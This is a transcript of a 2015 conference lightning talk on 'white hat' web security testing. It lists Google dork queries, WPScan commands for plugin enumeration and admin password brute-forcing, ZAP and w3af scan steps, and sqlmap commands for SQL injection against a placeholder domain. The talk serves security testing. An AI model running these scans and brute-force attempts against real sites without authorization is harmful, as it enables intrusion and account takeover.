Upgrade to Pro — share decks privately, control downloads, hide ads and more …

I want to be a hacker... but I only look good i...

I want to be a hacker... but I only look good in a white hat

Lightning Uncon talk at Dutch PHP Conference 2015

Avatar for Jakub Gadkowski

Jakub Gadkowski

June 27, 2015
Tweet

More Decks by Jakub Gadkowski

Other Decks in Programming

Transcript

  1. GOOGLE • Data mining:
 site:target.com filetype:doc • SQL Injection/DB identification:


    site:target.com "supplied argument is not a valid MySQL” • For more check “Exploit Database”:
 https://www.exploit-db.com/
  2. WPSCAN First of all, update WPscan database:
 wpscan --update Quickscan

    (may require `sudo` on Ubuntu) only enumerate vulnerable plugins:
 wpscan -u domaintocheck.com -e vp
  3. WPSCAN Most popular plugins with plugin folder given (more accurate

    results):
 wpscan -u domaintocheck.com -e p --wp-plugins-dir content/plugins/ WPscan can also ‘brute force’ using dictionaries with passwords :
 wpscan -u domaintocheck.com --wordlist popularpass.txt --username admin
  4. ZAP PROXY QUICK SCAN • Might be a good idea

    to persist your session for future reference • Be sure you have plenty of memory and space as these sessions can grow quite large (200mb-500mb is standard)
  5. ZAP PROXY QUICK SCAN • fill in “URL to attack”

    field with your target address • press “Attack”
  6. W3AF QUICK SCAN • Backbox version does not work ‘out

    of the box’ • you need to update it manually.
  7. W3AF QUICK SCAN • First select scan type (e.g. OWASP

    Top 10) • Put the address in the “Target” field • Press “Start”
  8. SQLMAP Once you have a suspect parameter for injection:
 sqlmap

    -u “http://domaintocheck.com/search?search=1” --threads=3 --risk=2 --level=2 If you know your target platform (say MySQL) and want only table names, you can speedup the process:
 sqlmap -u "http://domaintocheck.com/search?search=1" --threads=3 --risk=2 --level=2 --tables --dbms=MySQL